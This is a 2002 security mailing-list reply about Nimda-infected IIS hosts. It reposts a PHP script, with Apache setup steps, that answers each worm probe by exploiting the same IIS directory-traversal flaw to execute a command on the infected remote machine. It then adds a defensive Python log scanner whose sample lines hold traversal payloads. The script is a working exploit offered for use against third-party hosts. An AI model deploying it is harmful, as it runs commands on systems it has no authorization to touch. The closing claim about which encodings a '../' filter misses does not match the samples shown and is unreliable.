Vulnerability Development mailing list archives
Re: Publishing Nimda Logs
From: Jonathan Bloomquist <bocasolutions () yahoo com>
Date: Tue, 7 May 2002 12:36:09 -0700 (PDT)
--- "Deus, Attonbitus" <Thor () HammerofGod com> wrote:

-- snip --

> 1) Recommended. Go for it and publish the IPs and let the "Gods of IP" sort out the damage.
> 2) A Bad Thing. These are innocent victims, and you will just have them be attacked by evil people.
> 3) Boring. Who cares? It's Nimda, and an everyday part of life. Deal with it and ignore the logs.
>
> If "1," then I was thinking of going with a "Hall of Shame" and providing ARIN lookups, contacts, and the whole bit. I could even allow other people to post logs there and stuff like that... Input appreciated.
How about another option (4. warn the infected), as proposed in this Slashdot post (text follows): http://slashdot.org/comments.pl?sid=21830&cid=2329699

I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe":

<?php
/* Open a connection back to the offender (the infected IIS host that just probed us) */
$fp = fsockopen($_SERVER['REMOTE_ADDR'], 80, $errno, $errstr, 5);

/* Check to see if the connection actually opened */
if ($fp) {
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");

    /* ...and send it through the same directory-traversal hole the worm itself uses */
    fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\r\n\r\n");

    /* close the connection (though it probably got closed automatically) */
    fclose($fp);
}

/* for fun and confusion: answer the worm with a fake Apache 404 page */
header("HTTP/1.0 404 Not Found");
echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n";
echo "<html><head>\n<title>404 Not Found</title>\n</head><body>\n";
echo "<h1>Not Found</h1>\n";
echo "The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n";
echo "<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n";
echo "</body></html>\n";

/* log the host we just warned */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
if ($log) {
    fwrite($log, $_SERVER['REMOTE_ADDR'] . " " . date("D, d M Y H:i:s T") . " - " . $res);
    fclose($log);
}
?>

Then, after making sure users can access the file, try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right? Well, here's how you change that.

Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put in a line like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:

/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.
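Whichever of the options in the thread one picks (publish, warn, or ignore), the first step is to pull the Nimda probes out of the web logs reliably, and the worm did not use only the one /msadc/..%c0%af... form the script above answers: it cycled through a family of encodings (overlong UTF-8 such as %c0%af and %c1%1c, and double-encoded backslashes such as %255c) that the vulnerable IIS versions canonicalized into "/" or "\" after their path check had already run. The following is an added example, not code from the original post or from the Slashdot source it quotes: a small Python scanner that parses Apache access-log lines, decodes request paths the way that IIS did, and tallies probing hosts per source IP. The log lines, IP addresses, and function names are constructed for illustration.

```python
"""Detect Nimda-style IIS traversal probes in Apache access logs.

Added example (not code from the original post or the Slashdot source).
Request paths are canonicalized the way the vulnerable IIS did: two rounds
of percent-decoding (so %255c -> %5c -> '\\') and the overlong two-byte
UTF-8 forms (0xC0/0xC1 lead bytes) merged into one ASCII character even
when the second byte is not a valid continuation byte (%c1%1c -> '\\').
SAMPLE_LOG is constructed for illustration.
"""
import re
from collections import defaultdict

HEX = set("0123456789abcdefABCDEF")

# Apache common/combined log format, just the fields this scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# Constructed sample: three probing hosts plus one benign client.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2001:13:40:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
203.0.113.7 - - [18/Sep/2001:13:40:03 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
203.0.113.7 - - [18/Sep/2001:13:40:04 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
198.51.100.9 - - [18/Sep/2001:13:41:10 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
198.51.100.9 - - [18/Sep/2001:13:41:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
192.0.2.44 - - [18/Sep/2001:13:42:00 -0400] "GET /index.html HTTP/1.0" 200 1754
192.0.2.44 - - [18/Sep/2001:13:42:01 -0400] "GET /images/%c3%a9.png HTTP/1.0" 200 512
"""


def percent_decode(s: str) -> str:
    """One pass of %XX decoding. Code points in the result are byte values
    (0-255); malformed escapes such as '%%3' are kept literally."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '%' and i + 2 < len(s) and s[i + 1] in HEX and s[i + 2] in HEX:
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(chr(ord(s[i]) & 0xFF))
            i += 1
    return ''.join(out)


def lenient_utf8(s: str) -> str:
    """Merge two-byte UTF-8 sequences as the vulnerable IIS did. Overlong
    leads 0xC0/0xC1 are accepted and the low six bits of the next byte are
    folded in even when it is not a continuation byte, so %c0%af -> '/' and
    %c1%1c -> '\\'. Well-formed leads 0xC2-0xDF need a real continuation."""
    out, i = [], 0
    while i < len(s):
        c = ord(s[i])
        if 0xC0 <= c <= 0xDF and i + 1 < len(s):
            nxt = ord(s[i + 1])
            if c <= 0xC1 or 0x80 <= nxt <= 0xBF:
                out.append(chr(((c & 0x1F) << 6) | (nxt & 0x3F)))
                i += 2
                continue
        out.append(s[i])
        i += 1
    return ''.join(out)


def canonical_path(raw_path: str) -> str:
    """Query string dropped, two decode rounds, backslashes folded to '/'."""
    path = raw_path.split('?', 1)[0]
    for _ in range(2):          # the second round is what lets %255c through
        path = lenient_utf8(percent_decode(path))
    return path.replace('\\', '/').lower()


def classify(raw_path: str):
    """Return a probe label for Nimda-style requests, or None."""
    canon = canonical_path(raw_path)
    if 'root.exe' in canon:                       # Code Red II leftover the worm reuses
        return 'root.exe backdoor probe'
    if 'winnt/system32/cmd.exe' in canon:
        return 'traversal to cmd.exe' if '/../' in canon else 'direct cmd.exe probe'
    return None


def scan(log_text: str) -> dict:
    """Map source IP -> list of (label, raw request path) for flagged lines."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m['path'])
        if kind:
            hits[m['ip']].append((kind, m['path']))
    return dict(hits)


if __name__ == '__main__':
    for ip, probes in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip}: {len(probes)} probe(s)")
        for kind, path in probes:
            print(f"    {kind:24s} {path}")
```

The point of decoding twice and of accepting the overlong forms is to match what the target server saw, not what a strict RFC decoder would produce; a filter that only looks for the literal string "../" in the raw request line misses every variant in the sample except the %255c one after one decode, which is exactly the gap the worm exploited.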